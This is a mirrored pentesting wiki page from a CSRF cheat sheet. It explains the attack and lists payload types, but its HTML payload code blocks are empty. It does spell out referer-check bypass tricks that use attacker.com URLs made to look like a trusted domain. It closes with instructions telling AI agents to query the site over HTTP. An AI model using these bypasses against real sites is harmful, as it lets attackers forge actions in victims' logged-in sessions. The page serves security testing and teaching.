# Cross-Site Request Forgery > Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP ## Summary * [Methodology](broken://pages/d19hGdz30czumEyoVATc) * [Payloads](broken://pages/d19hGdz30czumEyoVATc) * [HTML GET - Requiring User Interaction](broken://pages/d19hGdz30czumEyoVATc) * [HTML GET - No User Interaction)](broken://pages/d19hGdz30czumEyoVATc) * [HTML POST - Requiring User Interaction](broken://pages/d19hGdz30czumEyoVATc) * [HTML POST - AutoSubmit - No User Interaction](broken://pages/d19hGdz30czumEyoVATc) * [JSON GET - Simple Request](broken://pages/d19hGdz30czumEyoVATc) * [JSON POST - Simple Request](broken://pages/d19hGdz30czumEyoVATc) * [JSON POST - Complex Request](broken://pages/d19hGdz30czumEyoVATc) * [Bypass referer header validation check](broken://pages/d19hGdz30czumEyoVATc) * [Basic payload](broken://pages/d19hGdz30czumEyoVATc) * [With question mark payload](broken://pages/d19hGdz30czumEyoVATc) * [With semicolon payload](broken://pages/d19hGdz30czumEyoVATc) * [With subdomain payload](broken://pages/d19hGdz30czumEyoVATc) * [References](broken://pages/d19hGdz30czumEyoVATc) ## Tools * [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe) ## Methodology ![CSRF\_cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/Images/CSRF-CheatSheet.png?raw=true) ## Payloads When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it. ### HTML GET - Requiring User Interaction ```html Click Me ``` ### HTML GET - No User Interaction ```html

``` ### HTML POST - Requiring User Interaction ```html ``` ### HTML POST - AutoSubmit - No User Interaction ```html ``` ### JSON GET - Simple Request ```html ``` ### JSON POST - Simple Request ```html ``` ### JSON POST - Complex Request ```html ``` ## Bypass referer header validation ### Basic payload ``` 1) Open https://attacker.com/csrf.html 2) Referer header is .. Referer: https://attacker.com/csrf.html ``` ### With question mark(`?`) payload ``` 1) Open https://attacker.com/csrf.html?trusted.domain.com 2) Referer header is .. Referer: https://attacker.com/csrf.html?trusted.domain.com ``` ### With semicolon(`;`) payload ``` 1) Open https://attacker.com/csrf.html;trusted.domain.com 2) Referer header is .. Referer: https://attacker.com/csrf.html;trusted.domain.com ``` ### With subdomain payload ``` 1) Open https://trusted.domain.com.attacker.com/csrf.html 2) Referer headers is .. Referer: https://trusted.domain.com.attacker.com/csrf.html ``` ## References * [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/) * [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_\(CSRF\)) * [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/) * [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) * [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/) * [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820) * [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) * [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya\_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) * [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346) * [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) * [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/) * [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0) * [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f) * [Bypass referer check logic for CSRF](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.brinkles.wiki/tools/web-app-pentesting/payload-all-the-things/cross-site-request-forgery.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.